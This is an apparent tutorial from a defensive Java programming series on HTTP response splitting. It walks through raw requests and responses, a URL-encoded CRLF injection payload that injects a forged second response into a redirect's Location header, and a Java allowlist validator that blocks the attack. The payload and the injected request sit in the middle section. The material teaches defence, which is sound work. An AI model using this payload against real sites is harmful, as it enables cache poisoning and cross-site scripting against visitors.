Defensive Java Programming Notes (07 of 11) HTTP Response Splitting


This is where an attacker is able to convince the browser that it actually received two HTTP responses; the browser then treats the second response as the content, and that second response is completely controlled by the attacker.

Example:

http://paradox.org/~attacker/redirect.php?page=http://www.evilSite.org

would direct the user's browser to http://www.evilSite.org, because the redirect script copies whatever is in the page parameter into the Location header.

Typically this is used as a stepping stone for other kinds of attacks, such as:

  • Cross-Site Scripting
  • Web cache poisoning
  • Hijacking pages with user-specific information
  • Browser cache poisoning

Frankly this one is a bit odd to fully grasp (at least for me). This attack by itself is not considered a major threat, but since it lends a helping hand to the more dangerous attacks it must be guarded against.

A clearer way to look at this attack is through the raw request and response. A typical GET request looks like this:

GET /~attacker/redirect.php?page=http://www.evilSite.org HTTP/1.1\r\n
Host: icis.digitalparadox.org\r\n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\r\n
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n

Note the \r\n (carriage return, line feed) at the end of every line: that pair is what terminates each header line, and an empty line (\r\n on its own) terminates the header block.

The response to this might look like this:

HTTP/1.1 302 Found\r\n
Date: Tue, 12 Apr 2005 21:00:28 GMT\r\n
Server: Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c\r\n
Location: http://www.digitalparadox.org\r\n
Keep-Alive: timeout=15, max=100\r\n
Connection: Keep-Alive\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n
\r\n

The redirect did exactly what it was written to do: the browser gets back a 302 redirect, BUT with the URL taken straight from the request copied into the Location header field.

So all that is needed is to inject some extra carriage return/line feed pairs followed by an additional bit of content. The URL encoding for \r\n is %0d%0a. An attacker can embed the following in place of the redirect location:

%0d%0a
Content-Type:%20text/html%0d%0a%20
HTTP/1.1%20200%20OK%0d%0a
Content-Type:%20text/html%0d%0a
%0d%0a
%3chtml%3e%3cfont%20color=red%3e%20hey%3c/font%3e%3c/html%3e

This produces the following request (I added some line breaks inside the query string just for formatting):

GET%20/~attacker/redirect.php?page=%0d%0aContent-Type:%20
text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:
%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Ehey
%3C/font%3E%3C/html%3E HTTP/1.1\r\n
Host: icis.digitalparadox.org\r\n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\r\n
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n

The URL-encoded parameter is decoded before it is acted on (this is normal and necessary), so the decoded carriage returns, line feeds and HTML land in the response, and the browser sees this:

HTTP/1.1 302 Found
Date: Tue, 12 Apr 2005 22:09:07 GMT
Server: Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c
Location:
Content-Type: text/html
HTTP/1.1 200 OK
Content-Type: text/html

<html><font color=red>hey</font></html>
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

On its own this is harmless, but if the injected second response carries a cross-site scripting payload then almost anything could be done to the victim. The defensive rule that follows is simple: never copy request data into a response header without first rejecting control characters, and never redirect to a destination the application has not explicitly approved.
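As an added defensive example (not code from the original notes), here is a plain-Java check for a request-supplied redirect target before it is handed to a Location header. The class name, the host allowlist and the sample inputs are assumptions; the injected sample is the payload from the notes in its URL-decoded form, as a servlet would actually receive it.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

/** Added example: validate a redirect target before it reaches a Location header. */
public final class SafeRedirect {
    // Assumed allowlist of hosts this application is permitted to redirect to.
    private static final Set<String> ALLOWED_HOSTS = Set.of("www.digitalparadox.org");

    /** True if the value holds CR, LF or any other control character that could break a header line. */
    static boolean containsHeaderBreak(String value) {
        return value.chars().anyMatch(c -> c < 0x20 || c == 0x7f);
    }

    // Returns a value safe to place in Location, or null when the request-supplied target must
    // be refused. Turn null into a fixed error response (e.g. HTTP 400); never echo the raw value.
    static String safeRedirectTarget(String untrusted) {
        if (untrusted == null || untrusted.isEmpty() || containsHeaderBreak(untrusted)) return null;
        try {
            URI uri = new URI(untrusted);
            // Same-site relative path: no scheme, no authority, single leading slash.
            if (uri.getScheme() == null && uri.getRawAuthority() == null && untrusted.startsWith("/")) {
                return uri.toASCIIString();
            }
            String scheme = uri.getScheme() == null ? "" : uri.getScheme().toLowerCase(Locale.ROOT);
            if (!scheme.equals("http") && !scheme.equals("https")) return null;
            String host = uri.getHost();
            if (host == null || !ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) return null;
            return uri.toASCIIString();
        } catch (URISyntaxException e) {
            return null; // malformed input is refused rather than "repaired"
        }
    }

    public static void main(String[] args) {
        // Constructed sample: the notes' payload as the application receives it, already URL-decoded.
        String injected = "\r\nContent-Type: text/html\r\n HTTP/1.1 200 OK\r\nContent-Type: text/html"
                + "\r\n\r\n<html><font color=red> hey</font></html>";
        String[] inputs = { injected, "http://www.evilSite.org", "//www.evilSite.org/x",
                            "/account/home", "http://www.digitalparadox.org/index.html" };
        for (String in : inputs) {
            String safe = safeRedirectTarget(in);
            System.out.println(safe == null ? "REFUSED" : "ALLOWED -> " + safe);
        }
    }
}
```

Most current servlet containers also refuse CR and LF in header values on their own; the allowlist check is what keeps the redirect destination itself under the application's control rather than the attacker's.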
